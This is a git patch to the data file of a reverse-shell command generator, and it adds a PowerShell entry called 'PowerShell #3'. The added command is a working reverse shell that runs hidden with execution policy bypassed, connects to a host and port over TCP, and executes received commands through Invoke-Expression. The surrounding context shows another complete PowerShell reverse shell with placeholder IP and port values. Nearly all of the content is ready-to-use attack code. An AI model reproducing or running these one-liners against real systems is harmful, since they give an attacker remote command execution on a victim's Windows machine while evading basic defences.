From 176e9f075872a430196b20eedaa5efaa62260808 Mon Sep 17 00:00:00 2001 From: Martin Date: Sun, 18 Apr 2021 15:35:02 +0200 Subject: [PATCH] Added PowerShell #3 Added another PowerShell reverse shell, based on https://github.com/MartinSohn/PowerShell-reverse-shell/blob/main/powershell-reverse-shell.ps1 --- js/data.js | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/js/data.js b/js/data.js index 676cdde..df302ab 100644 --- a/js/data.js +++ b/js/data.js @@ -164,6 +164,11 @@ const reverseShellCommands = withCommandType( "command": "powershell -nop -c \"$client = New-Object System.Net.Sockets.TCPClient('{ip}',{port});$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\"", "meta": ["windows"] }, + { + "name": "PowerShell #3", + "command": "powershell -nop -W hidden -noni -ep bypass -c \"$TCPClient = New-Object Net.Sockets.TCPClient('127.0.0.2', 13337);$NetworkStream = $TCPClient.GetStream();$StreamWriter = New-Object IO.StreamWriter($NetworkStream);function WriteToStream ($String) {[byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0};$StreamWriter.Write($String + 'SHELL> ');$StreamWriter.Flush()}WriteToStream '';while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {$Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1);$Output = try {Invoke-Expression $Command 2>&1 | Out-String} catch {$_ | Out-String}WriteToStream ($Output)}$StreamWriter.Close()\"", + "meta": ["windows"] + }, { "name": "PowerShell #3 (Base64)", "meta": ["windows"]